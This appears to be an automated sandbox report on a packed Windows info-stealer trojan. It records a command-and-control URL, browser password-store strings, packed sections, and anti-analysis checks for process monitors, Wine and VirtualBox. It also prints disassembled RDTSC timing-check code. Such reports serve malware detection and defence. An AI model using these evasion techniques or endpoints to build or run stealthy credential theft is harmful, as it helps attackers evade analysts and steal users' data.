              Source: NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/api
              Source: NAliwxUTJ4.exe, 00000001.00000003.2674035293.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2670051008.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/apilat/J
              Source: NAliwxUTJ4.exe, 00000001.00000003.2647853138.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/apio
              Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: NAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: NAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: NAliwxUTJ4.exe, 00000001.00000003.2616874817.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: NAliwxUTJ4.exe, 00000001.00000003.2616874817.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: NAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: NAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: NAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49729 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: NAliwxUTJ4.exeStatic PE information: section name:
              Source: NAliwxUTJ4.exeStatic PE information: section name: .idata
              Source: NAliwxUTJ4.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00EE14101_3_00EE1410
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E5A3641_3_00E5A364
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E5A3641_3_00E5A364
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E808E71_3_00E808E7
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E808E71_3_00E808E7
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E822C71_3_00E822C7
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E822C71_3_00E822C7
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E8228E1_3_00E8228E
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E8228E1_3_00E8228E
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E82BE61_3_00E82BE6
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E82BE61_3_00E82BE6
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E808E71_3_00E808E7
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E808E71_3_00E808E7
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E822C71_3_00E822C7
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E822C71_3_00E822C7
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E8228E1_3_00E8228E
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E8228E1_3_00E8228E
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E82BE61_3_00E82BE6
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E82BE61_3_00E82BE6
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E5A3641_3_00E5A364
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E5A3641_3_00E5A364
              Source: NAliwxUTJ4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: NAliwxUTJ4.exeStatic PE information: Section: ZLIB complexity 0.9973980629280822
              Source: NAliwxUTJ4.exeStatic PE information: Section: speiiqif ZLIB complexity 0.9946216844627226
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@3/1
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: NAliwxUTJ4.exe, 00000001.00000003.2563874706.00000000054BA000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2586764821.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562710921.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2586889885.00000000054CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: NAliwxUTJ4.exeReversingLabs: Detection: 60%
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile read: C:\Users\user\Desktop\NAliwxUTJ4.exeJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: NAliwxUTJ4.exeStatic file information: File size 1861120 > 1048576
              Source: NAliwxUTJ4.exeStatic PE information: Raw size of speiiqif is bigger than: 0x100000 < 0x19e200

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeUnpacked PE file: 1.2.NAliwxUTJ4.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;speiiqif:EW;suzusvsz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;speiiqif:EW;suzusvsz:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: NAliwxUTJ4.exeStatic PE information: real checksum: 0x1cccfc should be: 0x1d2879
              Source: NAliwxUTJ4.exeStatic PE information: section name:
              Source: NAliwxUTJ4.exeStatic PE information: section name: .idata
              Source: NAliwxUTJ4.exeStatic PE information: section name:
              Source: NAliwxUTJ4.exeStatic PE information: section name: speiiqif
              Source: NAliwxUTJ4.exeStatic PE information: section name: suzusvsz
              Source: NAliwxUTJ4.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_054AFD88 push es; ret 1_3_054AFD89
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E5CF4E push eax; iretd 1_3_00E5CF51
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E5CF4E push eax; iretd 1_3_00E5CF51
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E5CF52 push eax; iretd 1_3_00E5CF55
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E5CF52 push eax; iretd 1_3_00E5CF55
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E804CB push eax; retf 1_3_00E804D9
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E804CB push eax; retf 1_3_00E804D9
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E840A0 push ds; retf 1_3_00E840A2
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E840A0 push ds; retf 1_3_00E840A2
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E804CB push eax; retf 1_3_00E804D9
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E804CB push eax; retf 1_3_00E804D9
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E840A0 push ds; retf 1_3_00E840A2
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E840A0 push ds; retf 1_3_00E840A2
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E5CF4E push eax; iretd 1_3_00E5CF51
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E5CF4E push eax; iretd 1_3_00E5CF51
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E5CF52 push eax; iretd 1_3_00E5CF55
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00E5CF52 push eax; iretd 1_3_00E5CF55
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeCode function: 1_3_00ECD5D1 push es; iretd 1_3_00ECD5D2
              Source: NAliwxUTJ4.exeStatic PE information: section name: entropy: 7.9808008709140585
              Source: NAliwxUTJ4.exeStatic PE information: section name: speiiqif entropy: 7.953421574141461

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B3D0D second address: 5B3D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B3D15 second address: 5B3D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEBD887DA84h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B3D2E second address: 5B3D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FEBD8FBE236h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B3D38 second address: 5B3D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B3FD5 second address: 5B3FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B3FDE second address: 5B3FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B3FE2 second address: 5B3FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B3FE8 second address: 5B3FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B3FEE second address: 5B3FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B821C second address: 5B82FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FEBD887DA76h 0x0000000a popad 0x0000000b pop ebx 0x0000000c xor dword ptr [esp], 35192E6Ah 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FEBD887DA78h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1E0Bh], eax 0x00000033 jmp 00007FEBD887DA7Eh 0x00000038 call 00007FEBD887DA87h 0x0000003d jns 00007FEBD887DA7Ch 0x00000043 pop esi 0x00000044 push 00000003h 0x00000046 add ecx, 25611EE0h 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007FEBD887DA78h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 00000016h 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 sbb edx, 4CD76F67h 0x0000006e push 00000003h 0x00000070 mov edi, ebx 0x00000072 call 00007FEBD887DA79h 0x00000077 jmp 00007FEBD887DA89h 0x0000007c push eax 0x0000007d jmp 00007FEBD887DA88h 0x00000082 mov eax, dword ptr [esp+04h] 0x00000086 pushad 0x00000087 pushad 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B82FF second address: 5B8349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEBD8FBE236h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007FEBD8FBE241h 0x00000011 pop esi 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 jne 00007FEBD8FBE245h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 jne 00007FEBD8FBE23Ch 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B8349 second address: 5B8381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 pop eax 0x00000009 or ecx, dword ptr [ebp+122D35F3h] 0x0000000f mov esi, eax 0x00000011 lea ebx, dword ptr [ebp+124540B2h] 0x00000017 mov edi, ebx 0x00000019 xchg eax, ebx 0x0000001a jmp 00007FEBD887DA7Ah 0x0000001f push eax 0x00000020 jo 00007FEBD887DA9Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FEBD887DA7Bh 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B83FD second address: 5B84CE instructions: 0x00000000 rdtsc 0x00000002 js 00007FEBD8FBE24Eh 0x00000008 jmp 00007FEBD8FBE248h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FEBD8FBE241h 0x00000015 nop 0x00000016 mov dword ptr [ebp+122D1E5Ch], esi 0x0000001c push 00000000h 0x0000001e call 00007FEBD8FBE248h 0x00000023 adc edx, 4AF7BEFCh 0x00000029 pop edi 0x0000002a push 5946A625h 0x0000002f push ecx 0x00000030 pushad 0x00000031 js 00007FEBD8FBE236h 0x00000037 pushad 0x00000038 popad 0x00000039 popad 0x0000003a pop ecx 0x0000003b xor dword ptr [esp], 5946A6A5h 0x00000042 push 00000003h 0x00000044 pushad 0x00000045 clc 0x00000046 jns 00007FEBD8FBE23Ch 0x0000004c popad 0x0000004d push 00000000h 0x0000004f jnc 00007FEBD8FBE248h 0x00000055 push 00000003h 0x00000057 push 00000000h 0x00000059 push ebx 0x0000005a call 00007FEBD8FBE238h 0x0000005f pop ebx 0x00000060 mov dword ptr [esp+04h], ebx 0x00000064 add dword ptr [esp+04h], 00000017h 0x0000006c inc ebx 0x0000006d push ebx 0x0000006e ret 0x0000006f pop ebx 0x00000070 ret 0x00000071 push C443ADFCh 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 ja 00007FEBD8FBE236h 0x0000007f pushad 0x00000080 popad 0x00000081 popad 0x00000082 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B84CE second address: 5B84D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B84D4 second address: 5B8533 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 0443ADFCh 0x0000000f mov ecx, ebx 0x00000011 jmp 00007FEBD8FBE245h 0x00000016 lea ebx, dword ptr [ebp+124540BBh] 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007FEBD8FBE238h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 stc 0x00000037 pushad 0x00000038 mov dl, 24h 0x0000003a mov edx, 70C26026h 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 jp 00007FEBD8FBE236h 0x0000004a pop ebx 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5B8687 second address: 5B868D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
